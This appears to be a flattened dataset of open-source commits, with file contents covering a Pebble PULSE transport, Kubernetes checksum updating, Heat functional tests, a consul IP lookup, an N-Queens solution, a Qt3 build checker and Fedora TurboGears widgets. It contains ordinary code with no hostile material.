commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
96451643294003992e6d73ec34876badae177ed8 | Add PULSE support | pebble/libpebble2 | libpebble2/communication/transports/pulse.py | libpebble2/communication/transports/pulse.py | from __future__ import absolute_import
__author__ = 'Liam McLoughlin'
import struct
try:
import pulse2
except ImportError:
pass
from . import BaseTransport, MessageTargetWatch
from libpebble2.exceptions import ConnectionError, PebbleError
class PULSETransport(BaseTransport):
    """
    Represents a direct connection to a physical/virtual Pebble using the PULSEv2 interface.
    This transport expects to be given a PULSE2 Link object.

    :param link: A PULSE2 Interface object to tunnel Pebble Protocol over.
    :type link: pulse2.link.Interface
    """
    must_initialise = True

    # Port the watch listens on for Pebble-Protocol-over-PULSE traffic.
    PPOPULSE_PORT = 0x3e22

    # Single-byte opcodes prefixed to every PPoPULSE frame.
    OPCODE_PROTOCOL_DATA = 0x1
    OPCODE_CONNECT = 0x2
    OPCODE_DISCONNECT = 0x3

    def __init__(self, link):
        self.link = link
        self.connection = None
        self.buffer = b''
        # The module-level import is allowed to fail so other transports
        # keep working; fail fast here if pulse2 is actually needed.
        try:
            import pulse2
        except ImportError:
            raise PebbleError('pulse2 package not installed: it is required for PULSE transport')

    @staticmethod
    def _opcode(opcode):
        """Pack *opcode* into its one-byte wire representation."""
        return struct.pack('B', opcode)

    @staticmethod
    def _chunks(list_items, chunk_length):
        """Yield successive slices of *list_items*, each at most *chunk_length* long."""
        # range() instead of xrange(): equivalent here and works on Python 3 too.
        for i in range(0, len(list_items), chunk_length):
            yield list_items[i:i+chunk_length]

    def connect(self):
        """Open the PPoPULSE socket and announce ourselves to the watch."""
        self.connection = self.link.open_socket('reliable', self.PPOPULSE_PORT)
        if not self.connection:
            raise ConnectionError('Failed to open PPoPULSE socket')
        self._send_with_opcode(self.OPCODE_CONNECT)

    def disconnect(self):
        """Tell the watch we are leaving (best effort) and drop the socket."""
        if self.connected:
            try:
                self._send_with_opcode(self.OPCODE_DISCONNECT)
            except pulse2.exceptions.SocketClosed:
                # Link already gone; nothing left to notify.
                pass
            self.connection.close()
            self.connection = None

    @property
    def connected(self):
        return self.connection is not None

    def read_packet(self):
        """Block until one complete Pebble Protocol message is buffered.

        Returns a ``(MessageTargetWatch(), message_bytes)`` tuple and raises
        :class:`ConnectionError` when the transport closes underneath us.
        """
        while self.connected:
            # A Pebble Protocol frame starts with a big-endian 16-bit payload
            # length; the frame on the wire is payload + 4 header bytes.
            if len(self.buffer) >= 2:
                length, = struct.unpack('!H', self.buffer[:2])
                length += 4
                if len(self.buffer) >= length:
                    msg_data = self.buffer[:length]
                    self.buffer = self.buffer[length:]
                    return MessageTargetWatch(), msg_data
            try:
                packet = self.connection.receive(block=True)
            except (AttributeError, pulse2.exceptions.SocketClosed):
                self.connection = None
                raise ConnectionError('PULSE transport closed')
            # Every inbound frame must carry the protocol-data opcode.
            assert packet[0] == self._opcode(self.OPCODE_PROTOCOL_DATA)
            self.buffer += packet[1:]

    def send_packet(self, message, target=MessageTargetWatch()):
        assert isinstance(target, MessageTargetWatch)
        # Reserve one byte of each MTU-sized chunk for the opcode prefix.
        for chunk in self._chunks(message, self.connection.mtu - 1):
            self._send_with_opcode(self.OPCODE_PROTOCOL_DATA, chunk)

    def _send_with_opcode(self, opcode, body=None):
        """Send one frame: opcode byte followed by an optional payload."""
        assert self.connected
        data = self._opcode(opcode)
        if body:
            data += body
        self.connection.send(data)
| mit | Python |
|
4fd03b93f7c2ff31b6a7ab6bf6d404cc579a6bf8 | Rewrite download_hash in Python (#5995) | kubernetes-incubator/kubespray,kubernetes-sigs/kubespray,Atoms/kubespray,kubernetes-incubator/kubespray,kubernetes-incubator/kargo,kubernetes-sigs/kubespray,kubernetes-sigs/kubespray,Atoms/kubespray,kubernetes-sigs/kubespray,Atoms/kubespray,Atoms/kubespray,kubernetes-incubator/kargo | scripts/download_hash.py | scripts/download_hash.py | #!/usr/bin/env python3
# After a new version of Kubernetes has been released,
# run this script to update roles/download/defaults/main.yml
# with new hashes.
import hashlib
import sys
import requests
from ruamel.yaml import YAML
MAIN_YML = "../roles/download/defaults/main.yml"
def open_main_yaml():
    """Load MAIN_YML with round-trip settings preserved.

    Returns a ``(data, yaml)`` pair so the caller can dump the (possibly
    modified) data back with the very same YAML configuration.
    """
    loader = YAML()
    loader.explicit_start = True
    loader.preserve_quotes = True
    loader.width = 4096
    with open(MAIN_YML, "r") as handle:
        parsed = loader.load(handle)
    return parsed, loader
def download_hash(versions):
    """Download kubelet/kubectl/kubeadm for each version and architecture,
    compute their sha256 checksums and write them back into MAIN_YML.

    :param versions: iterable of Kubernetes version strings, with or
        without a leading "v".
    """
    architectures = ["arm", "arm64", "amd64"]
    downloads = ["kubelet", "kubectl", "kubeadm"]
    # Normalise the version strings once, instead of re-checking (and
    # re-assigning) them on every (download, arch) combination.
    versions = [v if v.startswith("v") else f"v{v}" for v in versions]
    data, yaml = open_main_yaml()
    for download in downloads:
        checksum_name = f"{download}_checksums"
        for arch in architectures:
            for version in versions:
                url = f"https://storage.googleapis.com/kubernetes-release/release/{version}/bin/linux/{arch}/{download}"
                download_file = requests.get(url, allow_redirects=True)
                # Abort on 404/5xx rather than hashing an error page.
                download_file.raise_for_status()
                sha256sum = hashlib.sha256(download_file.content).hexdigest()
                data[checksum_name][arch][version] = sha256sum
    with open(MAIN_YML, "w") as main_yml:
        yaml.dump(data, main_yml)
    print(f"\n\nUpdated {MAIN_YML}\n")
def usage():
    """Print the command-line synopsis to stdout."""
    print(
        "USAGE:\n"
        " {} [k8s_version1] [[k8s_version2]....[k8s_versionN]]".format(sys.argv[0])
    )
def main(argv=None):
    """Entry point: update checksums for the versions given on the command line.

    Exits with status 1 (after printing usage) when no versions are supplied.
    """
    args = argv if argv else sys.argv[1:]
    if not args:
        usage()
        sys.exit(1)
    download_hash(args)

if __name__ == "__main__":
    sys.exit(main())
| apache-2.0 | Python |
|
3b27b1d6b1c4739b8d456703542ec8182ce12277 | Add a Wordpress+MySQL composed instance functional test case | gonzolino/heat,noironetworks/heat,steveb/heat,cwolferh/heat-scratch,noironetworks/heat,gonzolino/heat,maestro-hybrid-cloud/heat,citrix-openstack-build/heat,pshchelo/heat,cryptickp/heat,dragorosson/heat,rh-s/heat,Triv90/Heat,steveb/heat,rh-s/heat,srznew/heat,srznew/heat,openstack/heat,redhat-openstack/heat,rickerc/heat_audit,jasondunsmore/heat,maestro-hybrid-cloud/heat,redhat-openstack/heat,pratikmallya/heat,rdo-management/heat,varunarya10/heat,pshchelo/heat,citrix-openstack-build/heat,rdo-management/heat,Triv90/Heat,dims/heat,takeshineshiro/heat,miguelgrinberg/heat,Triv90/Heat,rickerc/heat_audit,JioCloud/heat,miguelgrinberg/heat,NeCTAR-RC/heat,dragorosson/heat,ntt-sic/heat,cwolferh/heat-scratch,JioCloud/heat,openstack/heat,NeCTAR-RC/heat,dims/heat,jasondunsmore/heat,takeshineshiro/heat,cryptickp/heat,pratikmallya/heat,varunarya10/heat,ntt-sic/heat | heat/tests/functional/test_WordPress_Composed_Instances.py | heat/tests/functional/test_WordPress_Composed_Instances.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
#
import util
import verify
import nose
from nose.plugins.attrib import attr
import unittest
@attr(speed='slow')
@attr(tag=['func', 'wordpress', 'composed', 'WordPressComposedInstances'])
class WordPressComposedInstancesFunctionalTest(unittest.TestCase):
    """Functional test: boot the WordPress+MySQL composed-instance stack
    and verify the resulting WordPress site is actually operational."""

    def setUp(self):
        # Build the F17 JEOS image, launch the stack and block until the
        # in-instance cfn tooling reports provisioning has finished.
        template = 'WordPress_Composed_Instances.template'
        self.func_utils = util.FuncUtils()
        self.func_utils.prepare_jeos('F17', 'x86_64', 'cfntools')
        self.func_utils.create_stack(template, 'F17')
        self.func_utils.check_cfntools()
        self.func_utils.wait_for_provisioning()
        self.func_utils.check_user_data(template)
        self.ssh = self.func_utils.get_ssh_client()

    def test_instance(self):
        # ensure wordpress was installed by checking for expected
        # configuration file over ssh
        wp_file = '/etc/wordpress/wp-config.php'
        stdin, stdout, sterr = self.ssh.exec_command('ls ' + wp_file)
        result = stdout.readlines().pop().rstrip()
        assert result == wp_file
        print "Wordpress installation detected"
        # Verify the output URL parses as expected, ie check that
        # the wordpress installation is operational
        stack_url = self.func_utils.get_stack_output("WebsiteURL")
        print "Got stack output WebsiteURL=%s, verifying" % stack_url
        ver = verify.VerifyStack()
        assert True == ver.verify_wordpress(stack_url)
        # Tear the stack down at the end of the (single) test method.
        self.func_utils.cleanup()
| apache-2.0 | Python |
|
1172287e38f623994b039cea0dab36ea68d18471 | add RabbitService | lielongxingkong/ics_demo,lielongxingkong/ics_demo | ics_demo/remote_services/demo.py | ics_demo/remote_services/demo.py | from base import Service
from ics_demo.helpers.base import uuidgen
class RabbitService(Service):
    """Demo remote service: models a rabbit's warren as a directory tree
    under /tmp on the remote host, with carrots as empty files."""

    def it_is_my_warren(self, name):
        # mkdir -p keeps this idempotent if the warren already exists.
        cmd = 'mkdir -p /tmp/%s' % name
        self.remote_cmd_quiet(cmd)

    def put_carrot_bucket_in_my_warren(self, rabbit):
        cmd = 'mkdir /tmp/%s/carrots' % rabbit.name
        self.remote_cmd_quiet(cmd)

    def put_a_carrot(self, rabbit):
        # Each carrot is an empty file named with a fresh UUID.
        cmd = 'touch /tmp/%s/carrots/%s' % (rabbit.name, uuidgen())
        self.remote_cmd_quiet(cmd)

    def my_carrots(self, rabbit):
        # presumably remote_cmd_list returns one entry per listed file --
        # confirm against base.Service.
        cmd = 'ls /tmp/%s/carrots/' % rabbit.name
        return self.remote_cmd_list(cmd)
|
8de10ac1bf133c41cc1d0e330714e1659e42b092 | add script to write consul-manager ip to a text file | samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur,samuelclay/NewsBlur | consul/get_consul_manager_ip.py | consul/get_consul_manager_ip.py |
import os
import digitalocean
TOKEN_FILE = "/srv/secrets-newsblur/keys/digital_ocean.token"
with open(TOKEN_FILE) as f:
token = f.read().strip()
os.environ['DO_API_TOKEN'] = token
manager = digitalocean.Manager(token=token)
my_droplets = manager.get_all_droplets()
consul_manager_droplet = [d for d in my_droplets if d.name == "consul-manager"][0]
consul_manager_ip_address = consul_manager_droplet.ip_address
# write or overwrite the consul-manager ip
if "consul_manager_ip.txt" not in os.listdir('ansible'):
with open('consul_manager_ip.txt', 'w') as f:
f.write(consul_manager_ip_address) | mit | Python |
|
32f4055b52c8768c80cf82451f6ace74af600d0c | test new analyze rewrite | alexis-roche/nipy,alexis-roche/nireg,alexis-roche/register,alexis-roche/nipy,arokem/nipy,arokem/nipy,nipy/nireg,nipy/nipy-labs,bthirion/nipy,alexis-roche/register,bthirion/nipy,alexis-roche/niseg,bthirion/nipy,alexis-roche/nipy,alexis-roche/nipy,nipy/nireg,alexis-roche/register,arokem/nipy,bthirion/nipy,nipy/nipy-labs,alexis-roche/niseg,alexis-roche/nireg,arokem/nipy | lib/neuroimaging/refactoring/tests/test_analyze.py | lib/neuroimaging/refactoring/tests/test_analyze.py | import unittest
from neuroimaging.refactoring.analyze import AnalyzeImage
from neuroimaging.tests.data import repository
from neuroimaging.visualization.arrayview import arrayview
class AnalyzeImageTest(unittest.TestCase):
    """Smoke tests for the refactored AnalyzeImage reader."""

    def setUp(self):
        # "rho" is a sample image shipped in the test-data repository.
        self.image = AnalyzeImage("rho", datasource=repository)

    def test_header(self):
        # Touching raw_array presumably forces the header/data to be
        # read; the test only checks it does not raise.
        self.image.raw_array

    def test_arrayview(self):
        # Launches the interactive array viewer on the image data.
        arrayview(self.image.raw_array)

if __name__ == '__main__': unittest.main()
| bsd-3-clause | Python |
|
6feae8e14b4e690cb0d5c71880b9d6c167ac978b | add stub for a csv scraping script | texastribune/ipeds_reporter | ipeds_reporter/scripts/scrape.py | ipeds_reporter/scripts/scrape.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
WIP thing to scrape ipeds for me.
"""
from selenium import webdriver
def main():
    """Smoke test: open a Firefox WebDriver session and close it again.

    The actual IPEDS scraping logic is still to be written (see module
    docstring: "WIP thing to scrape ipeds").
    """
    driver = webdriver.Firefox()
    driver.close()

if __name__ == '__main__':
    main()
| apache-2.0 | Python |
|
4241d67149887f8edc0636f7cb4fdbcb22e8e98b | Create repeatings.py | vladshults/python_modules,vladshults/python_modules | job_interview_algs/repeatings.py | job_interview_algs/repeatings.py | TEXT = """abba com mother bill mother com
abba dog abba mother com"""
def secuenced_words(txt):
    """
    Return the group of three consecutive words that is repeated most
    often in *txt*, regardless of the order of the words in the group.

    Returns an empty list when *txt* contains fewer than three words.
    """
    word_list = txt.split()
    collector = {}
    for idx in range(1, len(word_list) - 1):
        # frozenset makes the group order-insensitive (and hashable);
        # note a group with repeated words collapses to fewer members.
        group = frozenset(word_list[idx - 1:idx + 2])
        collector[group] = collector.get(group, 0) + 1
    if not collector:
        # Fewer than three words: no groups at all (the original raised
        # IndexError here).
        return []
    # Bug fix: the original returned sorted(collector)[0], i.e. an
    # arbitrary group; pick the most frequent one as documented.
    return list(max(collector, key=collector.get))

if __name__ == "__main__":
    print(secuenced_words(TEXT))
| mit | Python |
|
3bd95d8789871246fb90c6eb0487d9746ef5cb27 | Migrate all project contents blocks to activity contents blocks | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/cms/migrations/0056_auto_20191106_1041.py | bluebottle/cms/migrations/0056_auto_20191106_1041.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-06 09:41
from __future__ import unicode_literals
from django.db import migrations
def migrate_project_blocks(apps, schema_editor):
    """Convert every ProjectsContent CMS block into an equivalent
    ActivitiesContent block, re-linking each project to the activities
    of the initiative with the same slug, then delete the old block."""
    ProjectsContent = apps.get_model('cms', 'ProjectsContent')
    ActivitiesContent = apps.get_model('cms', 'ActivitiesContent')
    Initiative = apps.get_model('initiatives', 'Initiative')
    ContentType = apps.get_model('contenttypes', 'ContentType')
    activity_content_ctype = ContentType.objects.get_for_model(ActivitiesContent)
    for projects_content in ProjectsContent.objects.all():
        # Copy the block-level fields across; polymorphic_ctype must
        # point at the new concrete model so it resolves correctly.
        activities_content = ActivitiesContent.objects.create(
            title=projects_content.title,
            sub_title=projects_content.sub_title,
            sort_order=projects_content.sort_order,
            placeholder=projects_content.placeholder,
            parent_id=projects_content.parent_id,
            language_code=projects_content.language_code,
            polymorphic_ctype_id=activity_content_ctype.pk,
            parent_type_id=projects_content.parent_type_id,
            highlighted=projects_content.from_homepage
        )
        for project in projects_content.projects.all():
            # Projects map to initiatives by slug; assumes a matching
            # Initiative exists -- raises DoesNotExist otherwise.
            initiative = Initiative.objects.get(slug=project.slug)
            for activity in initiative.activities.all():
                activities_content.activities.add(activity)
        activities_content.save()
        projects_content.delete()
class Migration(migrations.Migration):
    # Data migration only (no schema change); note there is no reverse
    # operation, so this migration cannot be unapplied.
    dependencies = [
        ('cms', '0055_migrate_statistics'),
    ]
    operations = [
        migrations.RunPython(migrate_project_blocks)
    ]
| bsd-3-clause | Python |
|
06570a926bde2ea10730062b05a2348c3020745c | Add example: filtered ensemble average. | cfe316/atomic,ezekial4/atomic_neu,ezekial4/atomic_neu | examples/filter_ensemble_average.py | examples/filter_ensemble_average.py | import numpy as np
import matplotlib.pyplot as plt
import atomic
from ensemble_average import time_dependent_power
if __name__ == '__main__':
times = np.logspace(-7, 0, 50)
temperature = np.logspace(0, 3, 50)
density = 1e19
from atomic.pec import TransitionPool
ad = atomic.element('argon')
tp = TransitionPool.from_adf15('adas_data/pec/*ar*.dat')
ad = tp.filter_energy(2e3, 20e3, 'eV').create_atomic_data(ad)
rt = atomic.RateEquations(ad)
y = rt.solve(times, temperature, density)
taus = np.array([ 1e14, 1e15, 1e16, 1e17, 1e18])/density
plt.figure(1); plt.clf()
from filter_construction import plot_coeffs
plot_coeffs(ad, temperature, 5)
plt.ylim(1e-35, 1e-30)
plt.draw()
plt.figure(2); plt.clf()
time_dependent_power(y, taus)
plt.draw()
plt.figure(3); plt.clf()
time_dependent_power(y, taus, ensemble_average=True)
plt.draw()
plt.show()
| mit | Python |
|
d9985ec4fa37cf99e0e541c7affadd5ec9288a0c | Create multithread.py | run-dong-zhu/Algorithms,run-dong-zhu/Algorithms,run-dong-zhu/Algorithms,run-dong-zhu/Algorithms | APIs/multithread.py | APIs/multithread.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 22:59:02 2018
@author: zhurundong
"""
import time
import requests
import asyncio
import aiohttp
from concurrent.futures import ThreadPoolExecutor
NUMBERS = range(12)
URL = 'http://httpbin.org/get?a={}'
# Get http requests results
def fetch(a):
r = requests.get(URL.format(a))
return r.json()['args']['a']
start = time.time()
for num in NUMBERS:
result = fetch(num)
print('fetch({}) = {}'.format(num, result))
print('cost time: {}'.format(time.time() - start))
# Get http requests results
def fetch(a):
r = requests.get(URL.format(a))
return r.json()['args']['a']
start = time.time()
# Using ThreadPool
with ThreadPoolExecutor(max_workers = 5) as executor:
for num, result in zip(NUMBERS, executor.map(fetch, NUMBERS)):
print('fetch({}) = {}'.format(num, result))
print('cost time: {}'.format(time.time() - start))
| epl-1.0 | Python |
|
93f6ebde39ef0538624ad3eb94316bf8bdf69fd9 | Create N_QueensII.py | UmassJin/Leetcode | Array/N_QueensII.py | Array/N_QueensII.py | Follow up for N-Queens problem.
Now, instead outputting board configurations, return the total number of distinct solutions.
class Solution:
    # @param {integer} n
    # @return {integer}
    def totalNQueens(self, n):
        """Count the distinct solutions of the n-queens puzzle."""
        if n == 0:
            return 0
        # Instance attribute so the recursive helper can accumulate the
        # count across calls.
        self.result = 0
        # checklist[row] = column of the queen placed in that row.
        checklist = [-1] * n
        self.queen_helper(n, 0, checklist)
        return self.result

    def check_helper(self, depth, i, checklist):
        """Return True if a queen at (row=depth, col=i) attacks none of
        the queens already placed in rows 0..depth-1."""
        for k in range(depth):
            # Same column, or same diagonal (equal row/column distance).
            if checklist[k] == i or abs(checklist[k] - i) == abs(depth - k):
                return False
        return True

    def queen_helper(self, n, depth, checklist):
        """Backtracking: try every non-attacked column for row *depth*."""
        if depth == n:
            self.result += 1
            return
        for i in range(n):
            if self.check_helper(depth, i, checklist):
                checklist[depth] = i
                self.queen_helper(n, depth + 1, checklist)
| mit | Python |
|
38b4ec7164f07af7135c41c401c4f403c1061d66 | Add skeleton for parsing commands | Zillolo/lazy-todo | app/main.py | app/main.py | """lazy
Usage:
lazy (new|n)
lazy (show|s) [<id>]
lazy (delete|d) [<id>]
lazy (import|i) <path>
lazy (export|e) <path> [<id>]
Options:
-h, --help: Show this help message.
"""
from docopt import docopt
def main():
    """Dispatch the lazy-todo subcommand parsed by docopt.

    Every branch is currently a stub awaiting implementation.
    NOTE(review): main() is never invoked anywhere in this module; an
    ``if __name__ == '__main__':`` guard still needs to be added.
    """
    # Parse commandline arguments.
    args = docopt(__doc__)
    if args['new'] or args['n']:
        # Insert a new task.
        pass
    elif args['show'] or args['s']:
        if args['<id>']:
            # Show the task whose ID most closely matches the given ID.
            pass
        else:
            # Show all tasks for the current user.
            pass
    elif args['delete'] or args['d']:
        if args['<id>']:
            # Delete the task with the ID that most closely matches the given
            # ID.
            pass
        else:
            # Prompt the user to input the ID of the task to delete.
            # Then delete the task with the ID that matches the given one best.
            pass
    elif args['import'] or args['i']:
        # Check if the given path exists and if so, import from it.
        pass
    elif args['export'] or args['e']:
        # Check if it is possible to write to the given path.
        if args['<id>']:
            # Write only the task with the ID that matches the given one best.
            pass
        else:
            # Write all tasks the current user has to the file.
            pass
| mit | Python |
|
b0f4a0abb74bc9f1cf97a49d4501c48d666b6dfe | add qt3 | tuttleofx/sconsProject | autoconf/qt3.py | autoconf/qt3.py | from _external import *
import os
def unique(seq):
    """Return the distinct elements of *seq* as a list.

    Fixes two problems with the original: the parameter shadowed the
    ``list`` builtin, and ``dict.fromkeys(...).keys()`` returns a view on
    Python 3, which callers then try to ``.sort()``; materialising a real
    list works on both Python 2 and 3.
    """
    return list(dict.fromkeys(seq))
def subdirs(files):
    """Return the sorted, de-duplicated parent directories of *files*.

    Replaces the hand-rolled unique()+sort() pair with the standard
    ``sorted(set(...))`` idiom; the result (a sorted list of distinct
    dirnames) is identical.
    """
    return sorted(set(map(os.path.dirname, files)))
def locateQt3Command(env, command, bindir):
    """Locate the Qt3 variant of *command* (moc, uic, ...) in *bindir*.

    Tries the '-qt3' and '3' suffixed names before the bare name, using
    SCons' env.WhereIs(); falls back to the unsuffixed command (with a
    warning) when nothing is found.
    """
    #print 'locateQt3Command:', command
    suffixes = [
        '-qt3',
        '3',
        '',
    ]
    progs = [command+s for s in suffixes]
    for prog in progs:
        path = env.WhereIs(prog, path=bindir)
        if path:
            return path
    msg = 'Qt3 command "' + command + '" not found. Tried: ' + str(progs) + '.'
    #raise Exception(msg)
    # Deliberately non-fatal: warn and hope the bare command resolves
    # later through the normal PATH.
    print 'Warning: ', msg
    return command
class Qt3Checker(LibWithHeaderChecker):
    '''
    Qt3 checker

    Configures an SCons build environment for Qt3: locates the Qt tools
    (moc, uic, rcc, lupdate, lrelease), checks the requested modules and
    headers, and wires up .ui file generation.
    '''
    def __init__( self,
                  modules = [
                      'qt',
                      'qui',
                  ],
                  uiFiles = [],
                  defines = ['QT_NO_KEYWORDS'],
                  useLocalIncludes = True ):
        # NOTE(review): mutable default arguments (lists) are shared
        # across instances; safe only while they are never mutated.
        self.name = 'qt3'
        self.libs = modules
        self.uiFiles = uiFiles
        self.defines = defines
        self.useLocalIncludes = useLocalIncludes

    def setModules(self, modules):
        self.libs = modules

    def declareUiFiles(self, uiFiles):
        self.uiFiles = uiFiles

    def initOptions(self, project, opts):
        LibWithHeaderChecker.initOptions(self, project, opts)
        # Expose a bindir_qt3 option, defaulting to <dir_qt3>/bin.
        opts.Add( 'bindir_'+self.name, 'Base directory for '+self.name, os.path.join('$dir_'+self.name, 'bin') )
        return True

    def configure(self, project, env):
        env.EnableQtEmmitters()
        bindir = '$bindir_'+self.name
        # Locate each Qt3 command-line tool (falls back with a warning).
        moc = locateQt3Command(env, 'moc', bindir)
        uic = locateQt3Command(env, 'uic', bindir)
        rcc = locateQt3Command(env, 'rcc', bindir)
        lupdate = locateQt3Command(env, 'lupdate', bindir)
        lrelease = locateQt3Command(env, 'lrelease', bindir)
        #print 'moc', moc
        env.SetDefault(
            QT_MOC = moc,
            QT_UIC = uic,
            QT_RCC = rcc,
            QT_LUPDATE = lupdate,
            QT_LRELEASE = lrelease,
        )
        # depends the developper syntax used
        # maybe we need to expose these values as parameters (in initOptions)
        env.Replace(
            QT_UICDECLPREFIX = '', # this is the standard value for qt3
            QT_UICDECLSUFFIX = '.h',
        )
        return BaseLibChecker.configure(self, project, env)

    def check(self, project, conf):
        conf.env.AppendUnique( CPPDEFINES = self.defines )
        result = self.CheckLibWithHeader( conf, self.libs, header=['qapplication.h'], language='c++' )
        return result

    def postconfigure(self, project, env):
        '''
        Special case: allows adding elements to the environment after
        the checks of all the libraries have run.
        '''
        if len(self.uiFiles):
            # Run uic on each declared .ui file; optionally add their
            # directories to the include path.
            uis = [env.Uic( ui ) for ui in self.uiFiles]
            if self.useLocalIncludes:
                env.AppendUnique( CPPPATH=subdirs(self.uiFiles) )
        return True
qt3 = Qt3Checker
| mit | Python |
|
3ed9dd0ca03216311771cda5f9cd3eb954a14d4f | Add boilerplate with simple test sounds | Parisson/Telemeta,Parisson/Telemeta,ANR-kamoulox/Telemeta,ANR-kamoulox/Telemeta,Parisson/Telemeta,ANR-kamoulox/Telemeta,ANR-kamoulox/Telemeta,Parisson/Telemeta | telemeta/management/commands/telemeta-test-boilerplate.py | telemeta/management/commands/telemeta-test-boilerplate.py | from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from django.template.defaultfilters import slugify
import os
from telemeta.models import *
from timeside.core.tools.test_samples import generateSamples
class Command(BaseCommand):
    help = "Setup and run a boilerplate for testing"
    # Used both as the collection code and as the item-code prefix.
    code = 'Tests'

    def handle(self, *args, **options):
        # NOT for production
        # self.processor_cleanup()
        # self.result_cleanup()
        media_dir = 'items' + os.sep + 'tests'
        samples_dir = settings.MEDIA_ROOT + media_dir
        # Generate TimeSide's test samples on disk; presumably returns a
        # {filename: path} dict (iteritems below) -- confirm in timeside.
        samples = generateSamples(samples_dir=samples_dir)
        collection, c = MediaCollection.objects.get_or_create(title=self.code,
                                                              code=self.code)
        for sample in samples.iteritems():
            filename, path = sample
            title = os.path.splitext(filename)[0]
            # Re-derive the item path relative to MEDIA_ROOT (the path
            # from generateSamples is discarded).
            path = media_dir + os.sep + filename
            item, c = MediaItem.objects.get_or_create(title=title,
                                                      code=self.code + '-' + slugify(filename),
                                                      file=path, collection=collection)
| agpl-3.0 | Python |
|
eeea573c3ecf6aa2baacdda61c0f9a248a28780f | add missing migration | DemocracyClub/yournextrepresentative,DemocracyClub/yournextrepresentative,DemocracyClub/yournextrepresentative | ynr/apps/uk_results/migrations/0034_auto_20180130_1243.py | ynr/apps/uk_results/migrations/0034_auto_20180130_1243.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-01-30 12:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema sync for uk_results: latest-by option,
    review-status choices and the confirmed default."""
    dependencies = [
        ('uk_results', '0033_auto_20170506_2042'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='postelectionresult',
            options={'get_latest_by': 'confirmed_resultset__created'},
        ),
        migrations.AlterField(
            model_name='councilelectionresultset',
            name='review_status',
            field=models.CharField(blank=True, choices=[(None, b'Unreviewed'), (b'unconfirmed', b'Unconfirmed'), (b'confirmed', b'Confirmed'), (b'rejected', b'Rejected')], max_length=100),
        ),
        migrations.AlterField(
            model_name='postelectionresult',
            name='confirmed',
            field=models.BooleanField(default=True),
        ),
        migrations.AlterField(
            model_name='resultset',
            name='review_status',
            field=models.CharField(blank=True, choices=[(None, b'Unreviewed'), (b'unconfirmed', b'Unconfirmed'), (b'confirmed', b'Confirmed'), (b'rejected', b'Rejected')], max_length=100),
        ),
    ]
| agpl-3.0 | Python |
|
59f0a18b5232e866f84fdaf6688ced5a1b4a9c44 | Add fedora.tg.widgets module containing a few proof-of-concept Fedora TurboGears widgets | fedora-infra/python-fedora | fedora/tg/widgets.py | fedora/tg/widgets.py | # Proof-of-concept Fedora TurboGears widgets
# Authors: Luke Macken <lmacken@redhat.com>
import re
import urllib2
import feedparser
import simplejson
from bugzilla import Bugzilla
from turbogears.widgets import Widget
class FedoraPeopleWidget(Widget):
    """TurboGears widget listing the five newest Planet Fedora posts,
    each with the author's image extracted from the entry summary."""
    template = """
      <table xmlns:py="http://purl.org/kid/ns#" border="0">
        <tr py:for="entry in entries">
          <td><img src="${entry['image']}" height="32" width="32"/></td>
          <td><a href="${entry['link']}">${entry['title']}</a></td>
        </tr>
      </table>
    """
    params = ["entries"]

    def __init__(self):
        self.entries = []
        # Planet summaries start with an <img> tag; capture its src.
        regex = re.compile('<img src="(.*)" alt="" />')
        feed = feedparser.parse('http://planet.fedoraproject.org/rss20.xml')
        for entry in feed['entries'][:5]:
            self.entries.append({
                'link'  : entry['link'],
                'title' : entry['title'],
                'image' : regex.match(entry['summary']).group(1)
            })
class FedoraMaintainerWidget(Widget):
    """Widget listing the first five packages owned by *username*,
    fetched from the Fedora package database (pkgdb) JSON API."""
    template = """
      <table xmlns:py="http://purl.org/kid/ns#" border="0">
        <tr py:for="pkg in packages">
          <td><a href="https://admin.fedoraproject.org/pkgdb/packages/name/${pkg['name']}">${pkg['name']}</a></td>
        </tr>
      </table>
    """
    params = ["packages"]

    def __init__(self, username):
        page = urllib2.urlopen('https://admin.fedoraproject.org/pkgdb/users/packages/%s/?tg_format=json' % username)
        self.packages = simplejson.load(page)['pkgs'][:5]
class BugzillaWidget(Widget):
    """Widget listing the first five Fedora bugs assigned to *email*
    (order as returned by the Bugzilla XML-RPC query)."""
    template = """
      <table xmlns:py="http://purl.org/kid/ns#" border="0">
        <tr py:for="bug in bugs">
          <td>
            <a href="${bug.url}">${bug.bug_id}</a> ${bug.short_short_desc}
          </td>
        </tr>
      </table>
    """
    params = ["bugs"]

    def __init__(self, email):
        bz = Bugzilla(url='https://bugzilla.redhat.com/xmlrpc.cgi')
        self.bugs = bz.query({
            'product' : 'Fedora',
            'email1' : email,
            'emailassigned_to1' : True
        })[:5]
| lgpl-2.1 | Python |
|
